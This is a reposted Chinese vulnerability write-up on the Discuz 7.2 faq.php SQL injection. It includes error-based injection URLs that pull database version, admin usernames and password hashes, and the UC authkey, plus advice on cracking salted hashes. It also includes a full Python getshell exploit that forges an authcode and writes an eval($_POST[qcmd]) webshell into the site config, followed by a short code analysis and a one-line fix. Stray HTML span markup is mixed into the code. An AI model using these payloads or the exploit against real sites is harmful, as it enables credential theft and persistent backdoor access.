当前位置:Gxlcms > 数据库问题 > discuz /faq.php SQL Injection Vul

discuz /faq.php SQL Injection Vul

时间:2021-07-01 10:21:17 帮助过:5人阅读

. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考

 

1. 漏洞描述

  1. <span style="color: #800080;">1</span><span style="color: #000000;">. 通过获取管理员密码 
  2. </span><span style="color: #800080;">2</span>. 对管理员密码进行破解。通过在cmd5.com网站对管理密码进行查询,需要带salt,获取的salt要去掉最后一个数字<span style="color: #800000;">"</span><span style="color: #800000;">1</span><span style="color: #800000;">"</span><span style="color: #000000;">
  3. 例如下面获取: admin:c6c45f444cf6a41b309c9401ab9a55a7:066ff71
  4. 需要查询的是: c6c45f444cf6a41b309c9401ab9a55a7:066ff7
  5. </span><span style="color: #800080;">3</span><span style="color: #000000;">. 通过uc_key获取shell
  6. </span><span style="color: #800080;">4</span>. 进入后台,添加插件获取webshell

Relevant Link:

  1. http:<span style="color: #008000;">//</span><span style="color: #008000;">sebug.net/vuldb/ssvid-87115</span>
  2. http:<span style="color: #008000;">//</span><span style="color: #008000;">sebug.net/vuldb/ssvid-87114</span>


2. 漏洞触发条件

  1. <span style="color: #800080;">1</span><span style="color: #000000;">.获取数据库版本信息
  2. http:</span><span style="color: #008000;">//</span><span style="color: #008000;">localhost/discuz7.2/faq.php?action=grouppermission&gids[99]=‘&gids[100][0]=) and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)%23</span>
  3.  
  4. <span style="color: #800080;">2</span><span style="color: #000000;">.获取管理员账户密码
  5. http:</span><span style="color: #008000;">//</span><span style="color: #008000;">localhost/discuz7.2/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=) and (select 1 from (select count(*),concat((select (select (select concat(username,0x27,password) from cdb_members limit 1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23</span>
  6.  
  7. <span style="color: #800080;">3</span><span style="color: #000000;">.获取key
  8. http:</span><span style="color: #008000;">//</span><span style="color: #008000;">localhost/discuz7.2/faq.php?action=grouppermission&gids[99]=‘&gids[100][0]=) and (select 1 from (select count(*),concat(floor(rand(0)*2),0x3a,(select substr(authkey,1,62) from cdb_uc_applications limit 0,1),0x3a)x from information_schema.tables group by x)a)%23
  9. </span><span style="color: #008000;">//</span><span style="color: #008000;">通过error based injection报错获得注入信息</span>

0x1: POC

  1. <span style="color: #000000;">import sys,urllib,time,math,base64,hashlib,urllib2
  2. #contant raw
  3. def fg(kaishi, jieshu, wenben):
  4.     start </span>=<span style="color: #000000;"> wenben.find(kaishi);
  5.     </span><span style="color: #0000ff;">if</span> start >= <span style="color: #800080;">0</span><span style="color: #000000;">:
  6.         start </span>+=<span style="color: #000000;"> len(kaishi);
  7.         jieshu </span>=<span style="color: #000000;"> wenben.find(jieshu, start);
  8.         </span><span style="color: #0000ff;">if</span> jieshu >= <span style="color: #800080;">0</span><span style="color: #000000;">:
  9.             </span><span style="color: #0000ff;">return</span><span style="color: #000000;"> wenben[start:jieshu].strip();
  10. #microtime
  11. def microtime(get_as_float </span>=<span style="color: #000000;"> False) :
  12.     </span><span style="color: #0000ff;">if</span><span style="color: #000000;"> get_as_float:
  13.         </span><span style="color: #0000ff;">return</span><span style="color: #000000;"> time.time();
  14.     </span><span style="color: #0000ff;">else</span><span style="color: #000000;">:
  15.         </span><span style="color: #0000ff;">return</span> <span style="color: #800000;">‘</span><span style="color: #800000;">%.8f %d</span><span style="color: #800000;">‘</span> %<span style="color: #000000;"> math.modf(time.time());
  16. #authget
  17. def get_authcode(</span><span style="color: #0000ff;">string</span>, key = <span style="color: #800000;">‘‘</span><span style="color: #000000;">):
  18.     ckey_length </span>= <span style="color: #800080;">4</span><span style="color: #000000;">;
  19.     key </span>=<span style="color: #000000;"> hashlib.md5(key).hexdigest();
  20.     keya </span>= hashlib.md5(key[<span style="color: #800080;">0</span>:<span style="color: #800080;">16</span><span style="color: #000000;">]).hexdigest();
  21.     keyb </span>= hashlib.md5(key[<span style="color: #800080;">16</span>:<span style="color: #800080;">32</span><span style="color: #000000;">]).hexdigest();
  22.     keyc </span>= (hashlib.md5(microtime()).hexdigest())[-<span style="color: #000000;">ckey_length:];
  23.     #keyc </span>= (hashlib.md5(<span style="color: #800000;">‘</span><span style="color: #800000;">0.736000 1389448306</span><span style="color: #800000;">‘</span>).hexdigest())[-<span style="color: #000000;">ckey_length:]
  24.     cryptkey </span>= keya + hashlib.md5(keya+<span style="color: #000000;">keyc).hexdigest();
  25.     key_length </span>=<span style="color: #000000;"> len(cryptkey);
  26.     </span><span style="color: #0000ff;">string</span> = <span style="color: #800000;">‘</span><span style="color: #800000;">0000000000</span><span style="color: #800000;">‘</span> + (hashlib.md5(<span style="color: #0000ff;">string</span>+keyb)).hexdigest()[<span style="color: #800080;">0</span>:<span style="color: #800080;">16</span>]+<span style="color: #0000ff;">string</span><span style="color: #000000;">;
  27.     string_length </span>= len(<span style="color: #0000ff;">string</span><span style="color: #000000;">);
  28.     result </span>= <span style="color: #800000;">‘‘</span><span style="color: #000000;">;
  29.     box </span>= range(<span style="color: #800080;">0</span>, <span style="color: #800080;">256</span><span style="color: #000000;">);
  30.     rndkey </span>=<span style="color: #000000;"> dict();
  31.     </span><span style="color: #0000ff;">for</span> i <span style="color: #0000ff;">in</span> range(<span style="color: #800080;">0</span>,<span style="color: #800080;">256</span><span style="color: #000000;">):
  32.         rndkey[i] </span>= ord(cryptkey[i %<span style="color: #000000;"> key_length]);
  33.     j</span>=<span style="color: #800080;">0</span><span style="color: #000000;">;
  34.     </span><span style="color: #0000ff;">for</span> i <span style="color: #0000ff;">in</span> range(<span style="color: #800080;">0</span>,<span style="color: #800080;">256</span><span style="color: #000000;">):
  35.         j </span>= (j + box[i] + rndkey[i]) % <span style="color: #800080;">256</span><span style="color: #000000;">;
  36.         tmp </span>=<span style="color: #000000;"> box[i];
  37.         box[i] </span>=<span style="color: #000000;"> box[j];
  38.         box[j] </span>=<span style="color: #000000;"> tmp;
  39.     a</span>=<span style="color: #800080;">0</span><span style="color: #000000;">;
  40.     j</span>=<span style="color: #800080;">0</span><span style="color: #000000;">;
  41.     </span><span style="color: #0000ff;">for</span> i <span style="color: #0000ff;">in</span> range(<span style="color: #800080;">0</span><span style="color: #000000;">,string_length):
  42.         a </span>= (a + <span style="color: #800080;">1</span>) % <span style="color: #800080;">256</span><span style="color: #000000;">;
  43.         j </span>= (j + box[a]) % <span style="color: #800080;">256</span><span style="color: #000000;">;
  44.         tmp </span>=<span style="color: #000000;"> box[a];
  45.         box[a] </span>=<span style="color: #000000;"> box[j];
  46.         box[j] </span>=<span style="color: #000000;"> tmp;
  47.         result </span>+= chr(ord(<span style="color: #0000ff;">string</span>[i]) ^ (box[(box[a] + box[j]) % <span style="color: #800080;">256</span><span style="color: #000000;">]));
  48.     </span><span style="color: #0000ff;">return</span> keyc + base64.b64encode(result).replace(<span style="color: #800000;">‘</span><span style="color: #800000;">=</span><span style="color: #800000;">‘</span>, <span style="color: #800000;">‘‘</span><span style="color: #000000;">);
  49. #getshell  
  50. def get_shell(url0,key,host):
  51.     headers</span>={<span style="color: #800000;">‘</span><span style="color: #800000;">Accept-Language</span><span style="color: #800000;">‘</span>:<span style="color: #800000;">‘</span><span style="color: #800000;">zh-cn</span><span style="color: #800000;">‘</span><span style="color: #000000;">,
  52.              </span><span style="color: #800000;">‘</span><span style="color: #800000;">Content-Type</span><span style="color: #800000;">‘</span>:<span style="color: #800000;">‘</span><span style="color: #800000;">application/x-www-form-urlencoded</span><span style="color: #800000;">‘</span><span style="color: #000000;">,
  53.              </span><span style="color: #800000;">‘</span><span style="color: #800000;">User-Agent</span><span style="color: #800000;">‘</span>:<span style="color: #800000;">‘</span><span style="color: #800000;">Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)</span><span style="color: #800000;">‘</span><span style="color: #000000;">,
  54.              </span><span style="color: #800000;">‘</span><span style="color: #800000;">Referer</span><span style="color: #800000;">‘</span><span style="color: #000000;">:url0
  55.              };
  56.     tm </span>= time.time()+<span style="color: #800080;">10</span>*<span style="color: #800080;">3600</span><span style="color: #000000;">;
  57.     tm</span>=<span style="color: #800000;">"</span><span style="color: #800000;">time=%d&action=updateapps</span><span style="color: #800000;">"</span> %<span style="color: #000000;">tm;
  58.     code </span>=<span style="color: #000000;"> urllib.quote(get_authcode(tm,key));
  59.     url0</span>=url0+<span style="color: #800000;">"</span><span style="color: #800000;">?code=</span><span style="color: #800000;">"</span>+<span style="color: #000000;">code;
  60.     data1</span>=<span style="color: #800000;">‘‘‘</span><span style="color: #800000;"><?xml version="1.0" encoding="ISO-8859-1"?></span>
  61.             <root>
  62.             <item id=<span style="color: #800000;">"</span><span style="color: #800000;">UC_API</span><span style="color: #800000;">"</span>>http:<span style="color: #008000;">//</span><span style="color: #008000;">xxx\‘);eval($_POST[qcmd]);</span><span style="color: #008000;">//</span><span style="color: #008000;"></item></span>
  63.             </root><span style="color: #800000;">‘‘‘</span><span style="color: #800000;">;</span>
  64.     <span style="color: #0000ff;">try</span><span style="color: #000000;">:
  65.         req</span>=urllib2.Request(url0,data=data1,headers=<span style="color: #000000;">headers);
  66.         ret</span>=<span style="color: #000000;">urllib2.urlopen(req);
  67.     except:
  68.         </span><span style="color: #0000ff;">return</span> <span style="color: #800000;">"</span><span style="color: #800000;">error to read</span><span style="color: #800000;">"</span><span style="color: #000000;">;
  69.     data2</span>=<span style="color: #800000;">‘‘‘</span><span style="color: #800000;"><?xml version="1.0" encoding="ISO-8859-1"?></span>
  70.             <root>
  71.             <item id=<span style="color: #800000;">"</span><span style="color: #800000;">UC_API</span><span style="color: #800000;">"</span>>http:<span style="color: #008000;">//</span><span style="color: #008000;">aaa</item></span>
  72.             </root><span style="color: #800000;">‘‘‘</span><span style="color: #800000;">;</span>
  73.     <span style="color: #0000ff;">try</span><span style="color: #000000;">:
  74.         req</span>=urllib2.Request(url0,data=data2,headers=<span style="color: #000000;">headers);
  75.         ret</span>=<span style="color: #000000;">urllib2.urlopen(req);
  76.     except:
  77.         </span><span style="color: #0000ff;">return</span> <span style="color: #800000;">"</span><span style="color: #800000;">error</span><span style="color: #800000;">"</span><span style="color: #000000;">;
  78.     </span><span style="color: #0000ff;">return</span> <span style="color: #800000;">"</span><span style="color: #800000;">OK: </span><span style="color: #800000;">"</span>+host+<span style="color: #800000;">"</span><span style="color: #800000;">/config.inc.php | Password = qcmd</span><span style="color: #800000;">"</span>;  #去掉/config/<span style="color: #000000;">uc_config.php 为config.inc.php by niubl
  79. </span><span style="color: #0000ff;">#define</span> over<span style="color: #000000;">
  80. #url </span><span style="color: #0000ff;">from</span><span style="color: #000000;"> users
  81. right </span>=<span style="color: #000000;"> len(sys.argv);
  82. </span><span style="color: #0000ff;">if</span> right < <span style="color: #800080;">2</span><span style="color: #000000;">:
  83.     #note
  84.     print (</span><span style="color: #800000;">"</span><span style="color: #800000;">============================================================</span><span style="color: #800000;">"</span><span style="color: #000000;">);
  85.     print (</span><span style="color: #800000;">"</span><span style="color: #800000;">Discuz <= 7.2 Getshell</span><span style="color: #800000;">"</span><span style="color: #000000;">);
  86.     print (</span><span style="color: #800000;">"</span><span style="color: #800000;">Wrote by Airbasic</span><span style="color: #800000;">"</span><span style="color: #000000;">);
  87.     print (</span><span style="color: #800000;">"</span><span style="color: #800000;">Usage: py.exe </span><span style="color: #800000;">"</span> + sys.argv[<span style="color: #800080;">0</span>] + <span style="color: #800000;">"</span><span style="color: #800000;"> http://localhost/dz</span><span style="color: #800000;">"</span><span style="color: #000000;">);
  88.     print (</span><span style="color: #800000;">"</span><span style="color: #800000;">============================================================</span><span style="color: #800000;">"</span><span style="color: #000000;">);
  89.     raw_input(</span><span style="color: #800000;">""</span><span style="color: #000000;">);
  90.     sys.exit()
  91. url </span>= sys.argv[<span style="color: #800080;">1</span><span style="color: #000000;">];
  92.  
  93. #go
  94. url1 </span>= url + <span style="color: #800000;">"</span><span style="color: #800000;">/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=) and (select 1 from (select count(*),concat(floor(rand(0)*2),0x3a,(select substr(authkey,1,31) from cdb_uc_applications where appid =1))x from information_schema .tables group by x)a)%23</span><span style="color: #800000;">"</span><span style="color: #000000;">;
  95. url2 </span>= url + <span style="color: #800000;">"</span><span style="color: #800000;">/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=) and (select 1 from (select count(*),concat(floor(rand(0)*2),0x3a,(select substr(authkey,32,64) from cdb_uc_applications where appid =1))x from information_schema .tables group by x)a)%23</span><span style="color: #800000;">"</span><span style="color: #000000;">;
  96. #authkey1</span>~<span style="color: #800080;">31</span><span style="color: #000000;">
  97. wy1 </span>=<span style="color: #000000;"> urllib.urlopen(url1);
  98. nr1 </span>=<span style="color: #000000;"> wy1.read();
  99. authkey1 </span>= fg(<span style="color: #800000;">"</span><span style="color: #800000;">‘1:</span><span style="color: #800000;">"</span>,<span style="color: #800000;">"</span><span style="color: #800000;">‘ for</span><span style="color: #800000;">"</span><span style="color: #000000;">,nr1);
  100. #authkey32</span>~<span style="color: #800080;">64</span><span style="color: #000000;">
  101. wy2 </span>=<span style="color: #000000;"> urllib.urlopen(url2);
  102. nr2 </span>=<span style="color: #000000;"> wy2.read();
  103. authkey2 </span>= fg(<span style="color: #800000;">"</span><span style="color: #800000;">‘1:</span><span style="color: #800000;">"</span>,<span style="color: #800000;">"</span><span style="color: #800000;">‘ for</span><span style="color: #800000;">"</span><span style="color: #000000;">,nr2);
  104. #authkey
  105. authkey </span>= authkey1+<span style="color: #000000;">authkey2;
  106. #</span><span style="color: #0000ff;">get</span><span style="color: #000000;"> username and password
  107. #none
  108. #over
  109. #</span><span style="color: #0000ff;">get</span><span style="color: #000000;"> webshell
  110. url0 </span>= url + <span style="color: #800000;">"</span><span style="color: #800000;">/api/uc.php</span><span style="color: #800000;">"</span><span style="color: #000000;">;
  111. host </span>=<span style="color: #000000;"> url;
  112. print (</span><span style="color: #800000;">"</span><span style="color: #800000;">Wrote by Airbasic , GetShell Ok !</span><span style="color: #800000;">"</span><span style="color: #000000;">);
  113. print get_shell(url0,authkey,host);
  114. raw_input(</span><span style="color: #800000;">""</span>);

Relevant Link:

  1. http:<span style="color: #008000;">//</span><span style="color: #008000;">blog.csdn.net/yiyefangzhou24/article/details/36913287</span>
  2. http:<span style="color: #008000;">//</span><span style="color: #008000;">qqhack8.blog.163.com/blog/static/11414798520146711246279/</span>


3. 漏洞影响范围
4. 漏洞代码分析

/faq.php

  1. <span style="color: #000000;">..
  2. elseif($action </span>== <span style="color: #800000;">‘</span><span style="color: #800000;">grouppermission</span><span style="color: #800000;">‘</span><span style="color: #000000;">) 
  3. {
  4.     ..
  5.     </span><span style="color: #008000;">//</span><span style="color: #008000;">首先定义一个数组groupids,然后遍历$gids(这也是个数组,就是$_GET[gids])</span>
  6.     $groupids =<span style="color: #000000;"> array();
  7.     </span><span style="color: #0000ff;">foreach</span>($gids <span style="color: #0000ff;">as</span><span style="color: #000000;"> $row) 
  8.     {
  9.         </span><span style="color: #008000;">//</span><span style="color: #008000;">将数组中的所有值的第一位取出来放在groupids中</span>
  10.         $groupids[] = $row[<span style="color: #800080;">0</span><span style="color: #000000;">];
  11.         </span><span style="color: #008000;">/*</span><span style="color: #008000;">
  12.         这里的安全漏洞在于
  13.         discuz在全局会对GET数组进行addslashes转义,也就是说会将单引号"‘"转义成"\‘"
  14.         所以,如果我们的传入的参数是: gids[1]=‘的话,会被转义成$gids[1]=\‘,而这个赋值语句$groupids[] = $row[0]就相当于取了字符串的第一个字符,也就是"\",把转义符号取出来了
  15.         </span><span style="color: #008000;">*/</span><span style="color: #000000;">
  16.     }
  17.     </span><span style="color: #008000;">/*</span><span style="color: #008000;">
  18.     在将数据放入sql语句前,通过implodeids函数对$groupids进行处理了一遍
  19.     就是将刚才的$groupids数组用‘,‘分割开,组成一个类似于‘1‘,‘2‘,‘3‘,‘4‘的字符串返回。但是我们的数组刚取出来一个转义符,它会将这里一个正常的‘转义掉,比如这样:‘1‘,‘\‘,‘3‘,‘4‘
  20.     这样就把原本的用于闭合的单引号给转义了,使得黑客的注入数据得以"逃逸",也就是产生的注入,我们把报错语句放在3这个位置,就能报错
  21.     </span><span style="color: #008000;">*/</span><span style="color: #000000;">
  22.     $query </span>= $db->query(<span style="color: #800000;">"</span><span style="color: #800000;">SELECT * FROM {$tablepre}usergroups u LEFT JOIN {$tablepre}admingroups a ON u.groupid=a.admingid WHERE u.groupid IN (</span><span style="color: #800000;">"</span>.implodeids($groupids).<span style="color: #800000;">"</span><span style="color: #800000;">)</span><span style="color: #800000;">"</span><span style="color: #000000;">);
  23.     $groups </span>=<span style="color: #000000;"> array();
  24.     ..</span>

Relevant Link:

  1. http:<span style="color: #008000;">//</span><span style="color: #008000;">simeon.blog.51cto.com/18680/1440000</span>


5. 防御方法

/faq.php

  1. elseif($action == <span style="color: #800000;">‘</span><span style="color: #800000;">grouppermission</span><span style="color: #800000;">‘</span><span style="color: #000000;">) 
  2. {
  3.     </span><span style="color: #008000;">/*</span><span style="color: #008000;"> 对$gids进行初始化 </span><span style="color: #008000;">*/</span><span style="color: #000000;">
  4.     $gids </span>=<span style="color: #000000;"> array(); 
  5.     </span><span style="color: #008000;">/*</span> <span style="color: #008000;">*/</span>

Relevant Link:

  1. http:<span style="color: #008000;">//</span><span style="color: #008000;">www.crazydb.com/archive/Discuz7.xSQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E4%B8%8EEXP</span>
  2. http:<span style="color: #008000;">//</span><span style="color: #008000;">simeon.blog.51cto.com/18680/1440000</span>


6. 攻防思考

Copyright (c) 2015 LittleHann All rights reserved

 

discuz /faq.php SQL Injection Vul

标签:

人气教程排行

本站所有资源全部来源于网络,若本站发布的内容侵害到您的隐私或者利益,请联系我们删除!